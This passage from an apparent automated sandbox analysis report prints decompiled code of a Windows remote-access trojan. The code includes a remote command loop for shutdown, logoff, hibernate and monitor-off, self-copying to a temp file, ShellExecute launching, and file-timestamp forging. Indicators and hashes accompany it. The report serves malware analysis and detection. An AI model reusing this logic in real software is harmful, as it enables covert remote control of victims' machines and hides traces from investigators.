					}
					_t143 =  *0x2405abf8; // 0x2405b96c
					_t527 =  *_t143;
					if( *_t143 == 0) {
						L15:
						_t144 =  *0x2405abf8; // 0x2405b96c
						__eflags =  *_t144;
						if(__eflags != 0) {
							_t355 =  *0x2405ac40; // 0x2405b970
							__eflags = E24016C78( *_t355, _t393, __eflags) - 1;
							if(__eflags == 0) {
								_t358 =  *0x2405ab48; // 0x240570d4
								 *_t358 = 1;
							}
						}
						L18:
						E24016634(_v24, _t393, _t519, _t520, _t532); // executed
						E24016910( &_v56, _t393, _t395); // executed
						_push(_v56);
						_push(0x24038dfc);
						E240169B8( &_v60, _t393, _t395);
						_push(_v60);
						_push(0x24038dfc);
						E24016A60( &_v64, _t393, _t395); // executed
						_push(_v64);
						E240133FC();
						_t155 = E24016C78(_v24, _t393, _t532); // executed
						_t533 = _t155;
						if(_t155 == 0) {
							E24016DA0(_v24, _t393, E2401333C(_v28), _v28, _t520, _t533); // executed
						}
						Sleep(0x1388); // executed
						if( *0x2405ca50 != 0) {
							E24013120( &_v16,  *0x2405ca50);
							E24013088(0x2405ca50);
							__eflags = E24013674(0x24038dfc, _v16) - 1;
							E24013590(_v16, E24013674(0x24038dfc, _v16) - 1, 1,  &_v8);
							E240135D0( &_v16, E24013674(0x24038dfc, _v16), 1);
							_v12 = E240158F0(_v16, __eflags);
							goto L34;
						} else {
							 *0x2405ca58 =  *0x2405ca58 + 1;
							if( *0x2405ca58 >  *0x2405ca54) {
								 *0x2405ca58 = 0;
							}
							_t504 =  *0x2405ab80; // 0x2405b888
							E24013120( &_v16,  *((intOrPtr*)(_t504 +  *0x2405ca58 * 4)));
							_t537 = _v16;
							if(_v16 == 0) {
								E24013088( &_v8);
							} else {
								E24013590(_v16, E24013674(0x24038dfc, _v16) - 1, 1,  &_v8);
								E240135D0( &_v16, E24013674(0x24038dfc, _v16), 1);
								_v12 = E240158F0(_v16, _t537);
							}
							while(_v8 == 0) {
								Sleep(0x32);
								 *0x2405ca58 =  *0x2405ca58 + 1;
								__eflags =  *0x2405ca58 -  *0x2405ca54;
								if( *0x2405ca58 >  *0x2405ca54) {
									__eflags = 0;
									 *0x2405ca58 = 0;
								}
								_t320 =  *0x2405ab80; // 0x2405b888
								_t322 = E2401333C( *((intOrPtr*)(_t320 +  *0x2405ca58 * 4)));
								__eflags = _t322 - 9;
								if(_t322 < 9) {
									E24013088( &_v8);
								} else {
									_t507 =  *0x2405ab80; // 0x2405b888
									E24013120( &_v16,  *((intOrPtr*)(_t507 +  *0x2405ca58 * 4)));
									E24013590(_v16, E24013674(0x24038dfc, _v16) - 1, 1,  &_v8);
									E240135D0( &_v16, E24013674(0x24038dfc, _v16), 1);
									_v12 = E240158F0(_v16, __eflags);
								}
							}
							L34:
							if(_v8 != 0) {
								_push(_t522);
								_push(0x24038916);
								_push( *[fs:eax]);
								 *[fs:eax] = _t523;
								if( *0x2405ca4c != 0) {
									E24012688( *0x2405ca4c);
								}
								if( *0x2405ca4c != 0) {
									 *0x2405ca4c = 0;
								}
								 *0x2405ca4c = E24012658(1);
								_pop(_t503);
								 *[fs:eax] = _t503;
							}
							_t543 =  *0x2405ca4c;
							if( *0x2405ca4c == 0) {
								L68:
								_t171 =  *0x2405abfc; // 0x2405b99c
								CloseHandle( *_t171);
								_t448 =  *0x2405ac14; // 0x2405b94c
								_t395 = 0x24038f10;
								E24013388( &_v104, 0x24038f10,  *_t448);
								_t393 = E24014F18(0, 0, E24013534(_v104));
								if(GetLastError() != 0xb7) {
									goto L70;
								}
								CloseHandle(_t393);
								L74:
								_pop(_t454);
								 *[fs:eax] = _t454;
								_push(0x24038ddc);
								E240130AC( &_v104, 0x17);
								return E24013088( &_v8);
							} else {
								Sleep(0x64); // executed
								_push(_t522);
								_push(0x24038989);
								_push( *[fs:eax]);
								 *[fs:eax] = _t523;
								 *0x2405ca5c = GetTickCount();
								E24022908( *0x2405ca4c, _t393, _v12, _v8, _t519, _t520, _t543);
								_pop(_t458);
								 *[fs:eax] = _t458;
								if( *0x2405ca4c != 0 &&  *((char*)( *0x2405ca4c + 0x10)) == 1) {
									Sleep(0xa);
									_t202 =  *0x2405ab44; // 0x2405b974
									if( *_t202 != 0) {
										_t298 =  *0x2405ac44; // 0x240572fc
										_t547 =  *_t298;
										if( *_t298 == 0) {
											_t299 =  *0x2405ab44; // 0x2405b974
											E24024720( *_t299, _t393,  &_v68, "njkvenknvjebcddlaknvfdvjkfdskv", _t519, _t520, _t547);
											_t302 =  *0x2405ab44; // 0x2405b974
											E240130DC(_t302, _v68);
											_t304 =  *0x2405ab44; // 0x2405b974
											E2402E9EC( *_t304, _t393, _t519, _t520, _t547, _t556);
										}
									}
									_t203 =  *0x2405abb0; // 0x2405b8dc
									_push( *_t203);
									_push(0x24038e40);
									_push(0x24038e4c);
									E240133FC();
									E24038F28( *0x2405ca4c, _t393, _v72, _t519, _t520, _t547);
									while( *((char*)( *0x2405ca4c + 0x10)) == 1 &&  *0x2405ca50 == 0) {
										E24016DA0(_v24, _t393, 0, 0, _t520, __eflags);
										E24016634(_v24, _t393, _t519, _t520, __eflags);
										E24022B84( *0x2405ca4c, 0);
										E24013088( &_v20);
										E240395F4( *0x2405ca4c, _t393,  &_v20, _t519, _t520);
										__eflags = _v20;
										if(__eflags == 0) {
											continue;
										}
										__eflags = E24013674(0x24038e40, _v20) - 1;
										E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v76);
										E24013480(_v76, "myshutdown");
										if(__eflags == 0) {
											L55:
											_t237 =  *0x2405ac34; // 0x2406324c
											E240130DC(_t237, _v20);
											L24044A34(_t393, _t519, _t520, _t556);
											continue;
										}
										__eflags = E24013674(0x24038e40, _v20) - 1;
										E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v80);
										E24013480(_v80, "hibernar");
										if(__eflags == 0) {
											goto L55;
										}
										__eflags = E24013674(0x24038e40, _v20) - 1;
										E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v84);
										E24013480(_v84, "logoff");
										if(__eflags == 0) {
											goto L55;
										}
										__eflags = E24013674(0x24038e40, _v20) - 1;
										E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v88);
										E24013480(_v88, "poweroff");
										if(__eflags == 0) {
											goto L55;
										}
										__eflags = E24013674(0x24038e40, _v20) - 1;
										E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v92);
										E24013480(_v92, "myrestart");
										if(__eflags == 0) {
											goto L55;
										}
										__eflags = E24013674(0x24038e40, _v20) - 1;
										E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v96);
										E24013480(_v96, "desligarmonitor");
										if(__eflags != 0) {
											__eflags = E24013674(0x24038e40, _v20) - 1;
											E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1,  &_v100);
											E24013480(_v100, "reconnect");
											if(__eflags != 0) {
												__eflags = _v20;
												if(__eflags != 0) {
													__eflags = E24013674(0x24038e40, _v20);
													if(__eflags > 0) {
														E24022D34( *0x2405ca4c, 0x24038ee4);
														_t286 =  *0x2405ac34; // 0x2406324c
														E240130DC(_t286, _v20);
														__eflags = 0;
														_t289 = E240178C8(L24044A34, 0, 0);
														_t495 =  *0x2405abdc; // 0x24063254
														 *_t495 = _t289;
													}
												}
											} else {
												E240135D0( &_v20, E24013674(0x24038e40, _v20), 1);
												E24013590(_v20, E24013674(0x24038e40, _v20) - 1, 1, 0x2405ca50);
											}
											continue;
										}
										goto L55;
									}
									E24022638(0x24038ef0, _t393, _t520);
									if( *((char*)( *0x2405ca4c + 0x10)) == 1) {
										 *((intOrPtr*)( *((intOrPtr*)( *0x2405ca4c)) - 4))();
									}
									if( *0x2405ca4c != 0) {
										 *0x2405ca4c = 0;
									}
									E24013120( &_v20, "audiostop|");
									_t213 =  *0x2405ac34; // 0x2406324c
									E240130DC(_t213, _v20);
									_t216 = E240178C8(L24044A34, 0, 0);
									_t464 =  *0x2405abdc; // 0x24063254
									 *_t464 = _t216;
								}
								goto L68;
							}
						}
					}
					_t359 =  *0x2405ac40; // 0x2405b970
					if(E24016C78( *_t359, _t393, _t527) != 0) {
						goto L15;
					}
					E24017038( &_v48);
					_push(_v48);
					E240158BC( &_v52, _t395, 0, GetTickCount(), 0);
					_push(_v52);
					_push(".tmp");
					E240133FC();
					_push(_t522);
					_push(0x2403867f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t523;
					_push(0);
					_push(0);
					_push(E24013534(_v16));
					_t371 =  *0x2405abf8; // 0x2405b96c
					_t452 = E24013534( *_t371);
					_pop(_t399);
					E240161A0(0, _t393, _t399, _t452, _t520);
					_t376 =  *0x2405ac40; // 0x2405b970
					_t378 = E24013534( *_t376);
					_t381 = CopyFileA(E24013534(_v16), _t378, 0);
					asm("sbb eax, eax");
					_t530 = _t381 + 1 - 1;
					if(_t381 + 1 != 1) {
						L14:
						_pop(_t453);
						_pop(_t395);
						 *[fs:eax] = _t453;
						goto L18;
					}
					_t384 =  *0x2405ac40; // 0x2405b970
					_t386 = E24016438( *_t384, _t393, _t399, _t530);
					if(_t452 != 0) {
						if(__eflags <= 0) {
							goto L14;
						}
						L13:
						_t387 =  *0x2405ab48; // 0x240570d4
						 *_t387 = 1;
						goto L14;
					}
					_t532 = _t386 - 0x186a0;
					if(_t386 <= 0x186a0) {
						goto L14;
					} else {
						goto L13;
					}
					L70:
					CloseHandle(_t393);
					_t181 =  *0x2405ab28; // 0x2405aa88
					__eflags =  *_t181;
					if(__eflags != 0) {
						E24037CD4(0x24038f20, __eflags);
						Sleep(0x64);
						E24037CD4(0, __eflags);
						_t194 =  *0x2405ab28; // 0x2405aa88
						__eflags = 0;
						 *_t194 = 0;
					}
					__eflags =  *0x2405aa50 - 1;
				} while (__eflags != 0);
				_t182 =  *0x2405abe4; // 0x2405b998
				CloseHandle( *_t182);
				goto L74;
				L1:
				_push(0);
				_push(0);
				_t394 = _t394 - 1;
				_t524 = _t394;
				if(_t394 != 0) {
					goto L1;
				} else {
					_push(_t394);
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_push(_t522);
					_push(0x24038dd5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t523;
					E24017038( &_v32);
					_t395 = "UuU.uUu";
					E24013388( &_v24, "UuU.uUu", _v32);
					E24016910( &_v36, __ebx, "UuU.uUu"); // executed
					_push(_v36);
					_push(0x24038dfc);
					E240169B8( &_v40, __ebx, "UuU.uUu");
					_push(_v40);
					_push(0x24038dfc);
					E24016A60( &_v44, _t393, _t395);
					_push(_v44);
					E240133FC();
					_t139 = E24016C78(_v24, _t393, _t524); // executed
					_t525 = _t139;
					if(_t139 == 0) {
						_t395 = E2401333C(_v28);
						E24016DA0(_v24, _t393, _t390, _v28, __esi, _t525);
					}
					goto L4;
				}
			}













































































                                    0x240384fc
                                    0x240384fc
                                    0x240384fc
                                    0x240384fc
                                    0x240384fd
                                    0x240384ff
                                    0x240384ff
                                    0x2403858e
                                    0x2403858e
                                    0x2403858e
                                    0x24038595
                                    0x2403859c
                                    0x2403859e
                                    0x240385a3
                                    0x240385a3
                                    0x240385a6
                                    0x240385ab
                                    0x240385ae
                                    0x2403868b
                                    0x2403868b
                                    0x24038690
                                    0x24038693
                                    0x24038695
                                    0x240386a1
                                    0x240386a3
                                    0x240386a5
                                    0x240386aa
                                    0x240386aa
                                    0x240386a3
                                    0x240386ad
                                    0x240386b0
                                    0x240386b8
                                    0x240386bd
                                    0x240386c0
                                    0x240386c8
                                    0x240386cd
                                    0x240386d0
                                    0x240386d8
                                    0x240386dd
                                    0x240386e8
                                    0x240386f0
                                    0x240386f5
                                    0x240386f7
                                    0x24038709
                                    0x24038709
                                    0x24038713
                                    0x2403871f
                                    0x2403886d
                                    0x24038877
                                    0x2403888f
                                    0x24038898
                                    0x240388b4
                                    0x240388c1
                                    0x00000000
                                    0x24038725
                                    0x24038725
                                    0x24038736
                                    0x2403873a
                                    0x2403873a
                                    0x24038742
                                    0x24038751
                                    0x24038756
                                    0x2403875a
                                    0x240387ac
                                    0x2403875c
                                    0x24038778
                                    0x24038794
                                    0x240387a1
                                    0x240387a1
                                    0x24038858
                                    0x240387b8
                                    0x240387bd
                                    0x240387c8
                                    0x240387ce
                                    0x240387d0
                                    0x240387d2
                                    0x240387d2
                                    0x240387d7
                                    0x240387e5
                                    0x240387ea
                                    0x240387ed
                                    0x24038853
                                    0x240387ef
                                    0x240387f2
                                    0x24038801
                                    0x24038822
                                    0x2403883e
                                    0x2403884b
                                    0x2403884b
                                    0x240387ed
                                    0x240388c4
                                    0x240388c8
                                    0x240388cc
                                    0x240388cd
                                    0x240388d2
                                    0x240388d5
                                    0x240388df
                                    0x240388e6
                                    0x240388e6
                                    0x240388f2
                                    0x240388f6
                                    0x240388f6
                                    0x24038907
                                    0x2403890e
                                    0x24038911
                                    0x24038911
                                    0x24038943
                                    0x2403894a
                                    0x24038cfe
                                    0x24038cfe
                                    0x24038d06
                                    0x24038d0b
                                    0x24038d16
                                    0x24038d1b
                                    0x24038d32
                                    0x24038d3e
                                    0x00000000
                                    0x00000000
                                    0x24038d41
                                    0x24038db2
                                    0x24038db4
                                    0x24038db7
                                    0x24038dba
                                    0x24038dc7
                                    0x24038dd4
                                    0x24038950
                                    0x24038952
                                    0x24038959
                                    0x2403895a
                                    0x2403895f
                                    0x24038962
                                    0x2403896a
                                    0x2403897a
                                    0x24038981
                                    0x24038984
                                    0x240389bd
                                    0x240389d4
                                    0x240389d9
                                    0x240389e1
                                    0x240389e3
                                    0x240389e8
                                    0x240389eb
                                    0x240389f0
                                    0x240389fc
                                    0x24038a04
                                    0x24038a09
                                    0x24038a0e
                                    0x24038a15
                                    0x24038a15
                                    0x240389eb
                                    0x24038a1a
                                    0x24038a1f
                                    0x24038a21
                                    0x24038a26
                                    0x24038a33
                                    0x24038a40
                                    0x24038c85
                                    0x24038a51
                                    0x24038a59
                                    0x24038a65
                                    0x24038a6d
                                    0x24038a7a
                                    0x24038a7f
                                    0x24038a83
                                    0x00000000
                                    0x00000000
                                    0x24038a9c
                                    0x24038aa5
                                    0x24038ab2
                                    0x24038ab7
                                    0x24038bb5
                                    0x24038bb5
                                    0x24038bbd
                                    0x24038bc2
                                    0x00000000
                                    0x24038bc2
                                    0x24038ad0
                                    0x24038ad9
                                    0x24038ae6
                                    0x24038aeb
                                    0x00000000
                                    0x00000000
                                    0x24038b04
                                    0x24038b0d
                                    0x24038b1a
                                    0x24038b1f
                                    0x00000000
                                    0x00000000
                                    0x24038b38
                                    0x24038b41
                                    0x24038b4e
                                    0x24038b53
                                    0x00000000
                                    0x00000000
                                    0x24038b68
                                    0x24038b71
                                    0x24038b7e
                                    0x24038b83
                                    0x00000000
                                    0x00000000
                                    0x24038b98
                                    0x24038ba1
                                    0x24038bae
                                    0x24038bb3
                                    0x24038bdf
                                    0x24038be8
                                    0x24038bf5
                                    0x24038bfa
                                    0x24038c3c
                                    0x24038c40
                                    0x24038c4f
                                    0x24038c51
                                    0x24038c5d
                                    0x24038c62
                                    0x24038c6a
                                    0x24038c76
                                    0x24038c78
                                    0x24038c7d
                                    0x24038c83
                                    0x24038c83
                                    0x24038c51
                                    0x24038bfc
                                    0x24038c13
                                    0x24038c35
                                    0x24038c35
                                    0x00000000
                                    0x24038bfa
                                    0x00000000
                                    0x24038bb3
                                    0x24038ca2
                                    0x24038cb0
                                    0x24038cbb
                                    0x24038cbb
                                    0x24038cc5
                                    0x24038cc9
                                    0x24038cc9
                                    0x24038cd6
                                    0x24038cdb
                                    0x24038ce3
                                    0x24038cf1
                                    0x24038cf6
                                    0x24038cfc
                                    0x24038cfc
                                    0x00000000
                                    0x240389bd
                                    0x2403894a
                                    0x2403871f
                                    0x240385b4
                                    0x240385c2
                                    0x00000000
                                    0x00000000
                                    0x240385cb
                                    0x240385d0
                                    0x240385df
                                    0x240385e4
                                    0x240385e7
                                    0x240385f4
                                    0x240385fb
                                    0x240385fc
                                    0x24038601
                                    0x24038604
                                    0x24038607
                                    0x24038609
                                    0x24038613
                                    0x24038614
                                    0x24038620
                                    0x24038624
                                    0x24038625
                                    0x2403862c
                                    0x24038633
                                    0x24038642
                                    0x2403864a
                                    0x2403864d
                                    0x2403864f
                                    0x24038675
                                    0x24038677
                                    0x24038679
                                    0x2403867a
                                    0x00000000
                                    0x2403867a
                                    0x24038651
                                    0x24038658
                                    0x24038660
                                    0x2403866b
                                    0x00000000
                                    0x00000000
                                    0x2403866d
                                    0x2403866d
                                    0x24038672
                                    0x00000000
                                    0x24038672
                                    0x24038662
                                    0x24038667
                                    0x00000000
                                    0x24038669
                                    0x00000000
                                    0x24038669
                                    0x24038d59
                                    0x24038d5a
                                    0x24038d5f
                                    0x24038d64
                                    0x24038d67
                                    0x24038d6e
                                    0x24038d75
                                    0x24038d7c
                                    0x24038d81
                                    0x24038d86
                                    0x24038d88
                                    0x24038d88
                                    0x24038d8a
                                    0x24038d8a
                                    0x24038d97
                                    0x24038d9f
                                    0x00000000
                                    0x24038504
                                    0x24038504
                                    0x24038506
                                    0x24038508
                                    0x24038508
                                    0x24038509
                                    0x00000000
                                    0x2403850b
                                    0x2403850b
                                    0x2403850c
                                    0x2403850d
                                    0x2403850e
                                    0x24038511
                                    0x24038512
                                    0x24038517
                                    0x2403851a
                                    0x24038520
                                    0x2403852b
                                    0x24038530
                                    0x24038538
                                    0x2403853d
                                    0x24038540
                                    0x24038548
                                    0x2403854d
                                    0x24038550
                                    0x24038558
                                    0x2403855d
                                    0x24038568
                                    0x24038570
                                    0x24038575
                                    0x24038577
                                    0x24038581
                                    0x24038589
                                    0x24038589
                                    0x00000000
                                    0x24038577

                                    APIs
                                    • GetTickCount.KERNEL32 ref: 240385D3
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 24038642
                                    • Sleep.KERNEL32(00001388,?,24038DFC,?,24038DFC,?,?,24038DFC,?,24038DFC,?,00000000,24038DD5), ref: 24038713
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CopyCountFileSleepTick
                                    • String ID: .tmp$UuU.uUu$_SAIR$audiostop|$desligarmonitor$exit$hibernar$logoff$myrestart$myshutdown$njkvenknvjebcddlaknvfdvjkfdskv$poweroff$reconnect
                                    • API String ID: 3875903300-1445509685
                                    • Opcode ID: 2da9e32bb0d5d479e3ffeec1db929eecc612ea1d8821e7ea5debf371e89e6929
                                    • Instruction ID: 856d1dc70ec2ebdc0f14a73e89c4e0620dc8ae04097a81700b6a1c4dddd281dd
                                    • Opcode Fuzzy Hash: 2da9e32bb0d5d479e3ffeec1db929eecc612ea1d8821e7ea5debf371e89e6929
                                    • Instruction Fuzzy Hash: 31320C35A041099FFF01DFA8C880A9E7FFAFB58308F5084B5E508A7259DB78ADC58B55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240166E4, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E240166E4(void* __eax, char* __ecx, char* __edx, int _a4, char* _a8, char* _a12) {
				void* _t7;
				void* _t8;
				char* _t14;
				char* _t15;

				_t14 = __ecx;
				_t15 = __edx;
				_t8 = __eax;
				GetProcAddress(LoadLibraryA("shell32.dll"), "ShellExecuteA");
				_t7 = ShellExecuteA(_t8, _t15, _t14, _a12, _a8, _a4); // executed
				return _t7;
			}







                                    0x240166ea
                                    0x240166ec
                                    0x240166ee
                                    0x24016700
                                    0x24016714
                                    0x2401671a

                                    APIs
                                    • LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA,?,?,?,?,2404546A,00000000,00000000,2404E32C,2404E184,?,2404E184,?,?,2404E2A0), ref: 240166FA
                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 24016700
                                    • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,?,?,00000000,shell32.dll,ShellExecuteA,?,?,?,?,2404546A,00000000,00000000), ref: 24016714
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressExecuteLibraryLoadProcShell
                                    • String ID: ShellExecuteA$open$shell32.dll
                                    • API String ID: 3429701994-209507969
                                    • Opcode ID: df8b7060bf0a9b7f67e06e0d77e6a2326738ff75f58f97e36d14c9d1b9d425e7
                                    • Instruction ID: 1f4370a304c284cdd6ae91da79a8f23773aced1cdf96bb1c831f3774e499855a
                                    • Opcode Fuzzy Hash: df8b7060bf0a9b7f67e06e0d77e6a2326738ff75f58f97e36d14c9d1b9d425e7
                                    • Instruction Fuzzy Hash: 54E08C722002083B6310DADB9C80EAFBBADEFD9AA0310C52AB60CC7208D4309E4186F0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240382AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 65%
                                    			E240382AC() {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v80;
				void* _t34;
				void* _t51;
				void* _t65;
				long _t66;
				void* _t70;
				void* _t90;
				void* _t91;
				intOrPtr _t105;
				void* _t109;
				void* _t110;
				intOrPtr* _t112;

				_t91 = 5;
				do {
					_push(0);
					_push(0);
					_t91 = _t91 - 1;
				} while (_t91 != 0);
				_push(_t110);
				_push(_t109);
				_t90 =  *0x2405ab9c; // 0x2405b9c4
				_push(0x240384a4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t112;
				while(1) {
					_t34 = E2401333C( *_t90);
					_t114 = _t34 - 0x2710;
					if(_t34 >= 0x2710) {
						break;
					}
					E24013344(_t90, "XXXXXXXXXXXXXXXXXXXX");
				}
				E24013088(0x2405ca50);
				E24017038( &_v20);
				_t92 = "XxX.xXx";
				E24013388( &_v12, "XxX.xXx", _v20);
				E24016910( &_v24, _t90, "XxX.xXx");
				_push(_v24);
				_push(0x240384ec);
				E240169B8( &_v28, _t90, _t92);
				_push(_v28);
				_push(0x240384ec);
				E24016A60( &_v32, _t90, _t92);
				_push(_v32);
				E240133FC();
				_t51 = E24016C78(_v12, _t90, _t114); // executed
				_t115 = _t51;
				if(_t51 == 0) {
					E24016DA0(_v12, _t90, E2401333C(_v16), _v16, _t110, _t115); // executed
				}
				_t93 = 0;
				_t116 = 0;
				_v8 = E240178C8(E240384FC, 0, 0);
				Sleep(0x2710); // executed
				while(1) {
					L8:
					E24038298();
					E24016910( &_v36, _t90, _t93);
					_push(_v36);
					_push(0x240384ec);
					E240169B8( &_v40, _t90, _t93);
					_push(_v40);
					_push(0x240384ec);
					E24016A60( &_v44, _t90, _t93);
					_push(_v44);
					E240133FC();
					E24016634(_v12, _t90, _t109, _t110, _t116); // executed
					_t65 = E24016C78(_v12, _t90, _t116); // executed
					_t117 = _t65;
					if(_t65 == 0) {
						_t93 = E2401333C(_v16);
						E24016DA0(_v12, _t90, _t82, _v16, _t110, _t117); // executed
					}
					if( *0x2405ca4c == 0) {
						continue;
					}
					L11:
					_t66 = GetTickCount();
					_push(0);
					_push(_t66);
					_t70 =  *0x2405ca5c + 0x19a28;
					asm("cdq");
					if(0 != _v80) {
						L14:
						if(__eflags >= 0) {
							continue;
							do {
								do {
									do {
										goto L8;
									} while ( *0x2405ca4c == 0);
									goto L11;
								} while (__eflags >= 0);
								goto L15;
							} while (_t70 >=  *_t112);
						}
						L15:
						_push(_t111);
						_push(0x2403847a);
						_push( *[fs:eax]);
						 *[fs:eax] = _t112;
						E24022638(0x240384f8, _t90, _t110);
						_t116 = _v8;
						if(_v8 != 0) {
							E240178EC(_v8);
						}
						_v8 = E240178C8(E240384FC, 0, 0);
						Sleep(0x2710); // executed
						_pop(_t105);
						_pop(_t93);
						 *[fs:eax] = _t105;
						continue;
					}
					L8:
					E24038298();
					E24016910( &_v36, _t90, _t93);
					_push(_v36);
					_push(0x240384ec);
					E240169B8( &_v40, _t90, _t93);
					_push(_v40);
					_push(0x240384ec);
					E24016A60( &_v44, _t90, _t93);
					_push(_v44);
					E240133FC();
					E24016634(_v12, _t90, _t109, _t110, _t116); // executed
					_t65 = E24016C78(_v12, _t90, _t116); // executed
					_t117 = _t65;
					if(_t65 == 0) {
						_t93 = E2401333C(_v16);
						E24016DA0(_v12, _t90, _t82, _v16, _t110, _t117); // executed
					}
				}
			}

























                                    0x240382af
                                    0x240382b4
                                    0x240382b4
                                    0x240382b6
                                    0x240382b8
                                    0x240382b8
                                    0x240382bc
                                    0x240382bd
                                    0x240382be
                                    0x240382c7
                                    0x240382cc
                                    0x240382cf
                                    0x240382e0
                                    0x240382e2
                                    0x240382e7
                                    0x240382ec
                                    0x00000000
                                    0x00000000
                                    0x240382db
                                    0x240382db
                                    0x240382f3
                                    0x240382fb
                                    0x24038306
                                    0x2403830b
                                    0x24038313
                                    0x24038318
                                    0x2403831b
                                    0x24038323
                                    0x24038328
                                    0x2403832b
                                    0x24038333
                                    0x24038338
                                    0x24038343
                                    0x2403834b
                                    0x24038350
                                    0x24038352
                                    0x24038364
                                    0x24038364
                                    0x2403836e
                                    0x24038370
                                    0x24038377
                                    0x2403837f
                                    0x24038384
                                    0x24038384
                                    0x24038384
                                    0x2403838c
                                    0x24038391
                                    0x24038394
                                    0x2403839c
                                    0x240383a1
                                    0x240383a4
                                    0x240383ac
                                    0x240383b1
                                    0x240383bc
                                    0x240383c4
                                    0x240383cc
                                    0x240383d1
                                    0x240383d3
                                    0x240383dd
                                    0x240383e5
                                    0x240383e5
                                    0x240383f1
                                    0x00000000
                                    0x00000000
                                    0x240383f3
                                    0x240383f3
                                    0x240383fa
                                    0x240383fb
                                    0x2403840b
                                    0x24038410
                                    0x24038415
                                    0x24038424
                                    0x24038426
                                    0x00000000
                                    0x24038384
                                    0x24038384
                                    0x24038384
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x24038384
                                    0x00000000
                                    0x24038384
                                    0x24038422
                                    0x2403842c
                                    0x2403842e
                                    0x2403842f
                                    0x24038434
                                    0x24038437
                                    0x2403843f
                                    0x24038444
                                    0x24038448
                                    0x2403844d
                                    0x2403844d
                                    0x24038460
                                    0x24038468
                                    0x2403846f
                                    0x24038471
                                    0x24038472
                                    0x00000000
                                    0x24038472
                                    0x24038384
                                    0x24038384
                                    0x2403838c
                                    0x24038391
                                    0x24038394
                                    0x2403839c
                                    0x240383a1
                                    0x240383a4
                                    0x240383ac
                                    0x240383b1
                                    0x240383bc
                                    0x240383c4
                                    0x240383cc
                                    0x240383d1
                                    0x240383d3
                                    0x240383dd
                                    0x240383e5
                                    0x240383e5
                                    0x240383ea

                                    APIs
                                    • Sleep.KERNEL32(00002710,?,240384EC,?,240384EC,?,00000000,240384A4,?,?,?,?,00000000,00000000), ref: 2403837F
                                    • GetTickCount.KERNEL32 ref: 240383F3
                                    • Sleep.KERNEL32(00002710,00000000,2403847A,?,?,240384EC,?,240384EC,?,00002710,?,240384EC,?,240384EC,?,00000000), ref: 24038468
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CountTick
                                    • String ID: XXXXXXXXXXXXXXXXXXXX$XxX.xXx
                                    • API String ID: 207069750-1553977181
                                    • Opcode ID: ab51557a76bb226ced445433c1b3410f09f3f9bddcd835e4c67328f055936099
                                    • Instruction ID: 25fc874d78c06795fbb0b37c2b756a1d7c84d9662aa74cad94cb20b382630e4b
                                    • Opcode Fuzzy Hash: ab51557a76bb226ced445433c1b3410f09f3f9bddcd835e4c67328f055936099
                                    • Instruction Fuzzy Hash: AF415232A04108AFFF01DBA4DC90A9EBFF9FF54708F5084B5E504A7658DA34AAC5CB19
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24017666, Relevance: 7.6, APIs: 5, Instructions: 63timefileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E24017666(char __eax, void* __ebx, void* __eflags) {
				char _v8;
				struct _FILETIME _v16;
				void* _t22;
				void* _t34;
				intOrPtr _t37;
				void* _t40;

				_v8 = __eax;
				E24013524(_v8);
				_push(_t40);
				_push(0x24017719);
				_push( *[fs:eax]);
				 *[fs:eax] = _t40 + 0xfffffff4;
				_v16.dwLowDateTime = E24011D10(0x1869f) + 0x1c52fa0;
				_v16.dwHighDateTime = E24011D10(0x1869f) + 0x1c52fa0;
				_t22 = CreateFileA(E24013534(_v8), 0x40000000, 1, 0, 3, 0x2000000, 0); // executed
				_t34 = _t22;
				if(_t34 != 0xffffffff) {
					SetFileTime(_t34, 0,  &_v16, 0); // executed
					SetFileTime(_t34, 0, 0,  &_v16); // executed
					SetFileTime(_t34,  &_v16, 0, 0); // executed
				}
				CloseHandle(_t34); // executed
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E24017720);
				return E24013088( &_v8);
